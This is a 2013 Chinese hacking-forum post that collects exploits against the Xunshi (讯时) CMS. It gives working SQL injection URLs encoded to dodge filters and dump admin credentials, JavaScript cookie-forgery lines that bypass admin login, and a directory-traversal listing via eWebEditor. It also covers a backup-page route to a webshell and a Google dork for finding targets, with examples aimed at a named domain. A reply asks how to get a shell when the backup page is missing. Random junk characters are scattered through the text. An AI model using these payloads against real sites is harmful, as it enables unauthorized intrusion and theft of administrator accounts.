找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2375|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
* ^- G" r3 t# H9 k
# W1 D2 \& @, w在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)' l& t/ l7 {$ c& K0 k* d( g6 M3 P' n

: q+ d  M" X" B# U9 }: c以下本文总结来自黑防去年第9期杂志上的内容...
: W, H3 E2 \# }- l* B/ I4 k' L3 A2 O4 A3 j. b/ g+ w( u5 k+ F4 o
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%& t- j; l; \0 j+ D$ |
1 s# C2 I$ v/ k0 [9 H
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
. Y# e/ t  _# H) Z( \5 A' N/ o9 U, }  c$ G1 D0 i
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
: ^9 P" q" {  K' L6 K0 _这里一个注入
9 S# f6 `& T5 w8 u3 P5 H7 O2 [+ S  g- p. p/ S. N8 z& L+ B
效果如图:
9 g. J* b' V% R, T; H' |( Q9 K; _- n, {2 `( U, l1 C

! ^- {1 v, }! J8 w8 J, q- L
# y( A4 e  K( ~# K7 q这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
* f& Q$ I: x% \  l5 C
. \( v- f8 {2 B密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
9 f% G, Y. [9 w, t% K
/ z6 s- q' k( wjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
, T3 e1 n5 L7 Q4 T- Z7 b1 C- \7 F) [
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
$ e: U5 G& f! B, H
3 R0 a3 z& Y2 s; w! f5 P因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
# B! a  S0 p( q) E& M' r5 z5 N# m& L4 u
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
7 `6 N" s( {0 m# ?% Y, t' f7 B6 X0 P+ t' C
访问这页面来列目录..步骤如下:
/ D+ |4 G5 T- L* \  S2 I# A; z3 s) d4 o" e; O
javascript:alert(document.cookie="admindj=1")
3 D' E5 v; O7 g& _' A7 i
. ?& V: S9 ^% W: N4 jhttp://www.political-security.co ... asp?id=46&dir=../..9 m# n9 Q, T5 o" s- M! `

6 R0 i& n  |- Z) L. {: }* ~效果如图:
1 r. N: C. m; s; Z1 _
6 N/ q. T- D. Y% E( |* T 1 L1 f% Z* M1 O# ^' @

9 f' m# b1 W# O0 v% M这样全站目录都能瞧了..找到后台目录..进去..
- N: Q8 h7 {+ P( v; _" `/ P
* I6 r5 _% B9 f3 u( `那么进了后台怎么拿shell??上传--备份就ok了.., ?# J1 c9 r4 {/ x; D; ]
' ^1 S" e0 m. k+ t5 [: A4 E
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的.." m7 p' @, c& H) e) F) `* ^* Q

8 P4 W* s( t2 V$ S9 u这个我也碰到过一次..你都可以通过列目录来实现..
# M( d5 |3 Z- A$ ~0 b( b" `
* \" _2 K' |; p# z1 T6 D) ujavascript:alert(document.cookie="admindj=1")
" Q: A1 f% P- E1 |, G; q7 i; y) Q0 E5 r. d, Q+ k
http://www.political-security.co ... p?action=BackupData
. @% R1 \" D4 ^- D& b: p8 `7 F4 i" p0 w/ s+ Z: _: C
备份ok..
3 _0 y0 _" W# M, e, H2 c0 n' {
8 y- A0 X4 Z' G, N4 L. ~# E那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
& p* K1 e/ K- @$ N' E4 I' R; h/ r9 N0 Z2 A# u
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
  f5 W$ ~9 a9 |& f2 K% |
8 U0 Q% ~5 \- F' U- [' m" ]& O% V然后访问此页面进行注入..步骤如下:% ~% f& c" o# Z4 a. R+ U
4 u! F; ^  X$ [: X. P: D& A: w. v9 |
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1"); E3 U1 L! _& I3 K
, V0 l! d# N7 H
然后请求admin/admin_chk.asp页面
' _" ?* b" a3 ]3 T: B) ^+ A/ L
# m! b! _; `) W& G5 c3 n. F输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%9 h* \, O$ `  u

% s; a) w0 `+ u26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin  x8 H2 o: C5 ?) t! W7 R

/ P: b% \$ b8 W( `' P! D% s8 t效果如图所示:+ _* I( I* C( L. t, }

) o# f5 ^3 f4 Z* V3 k ( M9 F6 m% [1 G& }; n7 q
" C, O3 }* T8 C3 L. p  c9 {9 K
讯时漏洞2
$ E9 i, \1 C. ^% Q4 ]) I  egoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
. y, z  z2 I0 c5 [) s  n6 k5 l 7 Z# @* f% P( `4 v
1、/admin/admin_news_pl_view.asp?id=11 f, v+ z0 Y/ v3 @. S
//id任意 填入以下语句$ h, A9 I) r* _2 \+ w& o
" K. ~2 [7 T6 g
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
( ]% A5 v& p/ A. n
5 G- ~& W! Y7 f' s
6 y- f4 w3 X$ R+ e6 N6 r' i! d9 ]
" k* j, g# Z7 [3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
+ P2 Q" v% {, V4 ? % X0 i, s6 [; d9 H+ T2 a; C0 o
& h2 e4 G7 D4 O9 n

' S; Q6 J" v: r) P6 C9 U* v* e. `% S爆出管理员帐号和密码了, I" _+ f0 W0 A: g; I* v

2 ?" O1 i  B7 q6 a  e! P& M( O1 A' F9 h% S( h/ o5 B$ Y
  U: H3 y- ^9 a3 \
4、cookies进后台
" ^7 i# A6 T. Q9 `* g# H* F5 s ) c/ @  K1 Z! M
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
! T5 o' K! l: C5 E0 G+ J! ~2 X# N 1 v. |" o. e1 P3 D
7 u2 u4 L0 v( P8 `$ h3 b

: c1 G& ?: F7 }; \& x5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
9 D: p" u  {5 V+ o* G/ y , h5 ^! S5 w+ p+ m0 m) \' v

/ p" G( d* T8 s9 ?! [, l5 U* X& o
0 p9 Y, V' c# L, |6、后台有上传和备份取SHELL不难。
+ ?- ^# x% A2 }" y9 L8 O
4 z. k6 F  B7 `9 I  t/ o9 ]. l7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
. Q6 H4 K3 O. T9 E' m / d6 ?3 T1 f- g' b
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!4 h! z. l$ e8 ^0 @

$ T. \; Q" U) l. O2 z, @3 W0 p1 G) }6 e' u1 |4 t( J

  a6 y# p$ p0 j1 u) n: `+ e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表